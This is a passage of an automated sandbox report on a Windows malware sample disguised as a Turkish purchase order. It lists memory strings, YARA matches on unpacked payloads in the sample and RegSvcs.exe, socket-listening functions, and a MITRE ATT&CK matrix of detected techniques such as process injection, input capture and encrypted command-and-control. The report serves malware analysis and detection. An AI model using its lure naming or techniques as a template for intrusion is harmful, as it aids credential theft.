                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: WIN_XP
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: WIN_XPe
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: WIN_VISTA
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: WIN_7
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: WIN_8
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_006C6596
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe Code function: 0_2_006C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_006C6A5A
                MITRE ATT&CK Matrix

                The matrix is listed here by tactic (one line per column of the original matrix). A number in front of a technique is the hit counter shown in the original matrix cell for that technique; techniques without a number had no matching signatures.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 11 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; HTML Smuggling; Dynamic API Resolution
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 2 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 127 System Information Discovery; 131 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 1 Web Service; 4 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement